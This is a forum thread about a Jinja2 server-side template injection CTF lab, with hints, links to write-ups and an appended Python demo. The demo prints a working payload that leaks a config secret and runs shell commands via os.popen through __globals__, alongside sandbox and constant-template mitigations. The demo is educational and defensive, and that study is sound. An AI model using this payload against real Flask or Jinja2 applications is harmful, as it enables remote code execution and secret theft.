Forum Discussion
Pen Test CTFs: Jinja2 Exploitation
- 3 months ago
Team,
Thank you for reaching out in some manner. The lab is surprisingly straightforward... once you understand the vulnerability. Over the past week, this has been my sole focus, and what I have learnt is so valuable.
With regards to the CTF itself, the questions truly lead you to the answer. I had most of the answers, but I had to work out how to use them, and for that I had to understand them. I spent so long being punished by the limited characters and adding the 'space' that I didn't even think of using the answer to 'module.function'.
Then it clicked. What could have been a 20-minute adventure has led to some serious research and a real sense of achievement.
I can't say the answers were solutions, but they were certainly honourable suggestions:
Netcat's -
Most likely the answer lies in question 8: "What Python module and function allows you to access arguments in the query string?"
Steven's -
Learn how you can access the config register.
Config, Strings, Objects and Variables for the win.
Puuuh... hard to tell you without telling you :)
What will help you for sure: google for Jinja2 template exploits, and learn how you can access the config register, etc.
Later you'll find out that you'll be limited (see Q2) and will need to find a way around the issue.
Here's the list of links I read to solve this lab:
- https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/
- https://jinja.palletsprojects.com/en/stable/templates/#escaping
- https://anakint.medium.com/digital-overdose-2021-autumn-ctf-writeup-madlib-web-c51c5ded5260
- https://wassila-chtioui.com/post/yogosha-ctf23/
- http://167.86.82.176/yogosha_christmas_2023/
- https://def.camp/wp-content/uploads/dc2023/Remi%20Gascou.pdf
- https://blog.quentinra.dev/cybersecurity/red-team/s3.exploitation/vulns/injection/ssti.md
- https://niebardzo.github.io/2020-11-23-exploiting-jinja-ssti/
- https://forum.hackthebox.com/t/jinja2-ssti-filter-bypass-help-needed/3482/11
This might give you some indications of how to tackle the lab.
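Added example (not from the thread, the lab or any of the linked write-ups) showing the three things the hints above circle around: reading the config register through a template injection, walking from `config` to a module's globals to reach `os.popen` with the command supplied through `request.args` so the template itself stays short and quote-free, and what the two usual mitigations do about it. It uses Jinja2 directly rather than Flask; `AppConfig`, `FakeRequest`, the query-string values and the secret are stand-ins constructed for this demo, not anything from the lab.

```python
"""Jinja2 SSTI: config leak, RCE via __globals__, and two mitigations.

Added example. AppConfig and FakeRequest are constructed stand-ins for
Flask's `config` and `request` objects; the secret value is made up.
"""
import os  # lives in this module's globals, which is exactly what the payload reaches

import jinja2
from jinja2.sandbox import SandboxedEnvironment


class AppConfig(dict):
    """Stand-in for flask.Config (constructed). Its __init__ is a plain Python
    function, so __init__.__globals__ is this module's namespace (with `os` in it)."""

    def __init__(self, **kwargs):
        super().__init__(**kwargs)


class FakeRequest:
    """Stand-in for flask.request; only .args (the parsed query string) is modelled."""

    def __init__(self, args):
        self.args = args


def build_context(query_args):
    """What a Flask app typically exposes to every template (constructed values)."""
    return {
        "config": AppConfig(SECRET_KEY="s3cr3t-demo-key", DEBUG=False),
        "request": FakeRequest(query_args),
    }


def render_vulnerable(user_template, query_args=None):
    """The bug: user input is the template *source*, i.e. the equivalent of
    Flask's render_template_string(user_input)."""
    env = jinja2.Environment()
    return env.from_string(user_template).render(**build_context(query_args or {}))


def render_sandboxed(user_template, query_args=None):
    """Mitigation 1: same mistake inside SandboxedEnvironment, which refuses
    attribute access to underscore-prefixed names (__class__, __globals__, ...)."""
    env = SandboxedEnvironment()
    try:
        return env.from_string(user_template).render(**build_context(query_args or {}))
    except jinja2.exceptions.SecurityError as exc:
        return f"BLOCKED: {exc}"


def render_fixed(user_input):
    """Mitigation 2 (the real fix): the template is a constant and user input
    only ever arrives as a variable, so it is never parsed as template syntax."""
    env = jinja2.Environment(autoescape=True)
    return env.from_string("Hello, {{ name }}!").render(name=user_input)


# Step 1: read the config register directly.
LEAK = "{{ config.SECRET_KEY }}"

# Step 2: config -> its class -> __init__ -> that function's globals -> os.popen.
# Jinja falls back from attribute to item lookup, so `.os` works without quotes,
# and the command comes from request.args, which keeps the injected template short.
RCE = "{{ config.__class__.__init__.__globals__.os.popen(request.args.c).read() }}"


if __name__ == "__main__":
    print(render_vulnerable(LEAK))                      # the secret
    print(render_vulnerable(RCE, {"c": "id"}))          # command output
    print(render_sandboxed(RCE, {"c": "id"}))           # BLOCKED: ...
    print(render_sandboxed(LEAK))                       # still the secret!
    print(render_fixed(RCE))                            # payload echoed as text
```

Two things worth noticing when you run it: the sandbox stops the `__globals__` walk but happily prints `config.SECRET_KEY`, because it only polices attribute names, not what you put into the context; and `render_fixed` is the only variant where the payload is inert, since it never reaches the parser at all.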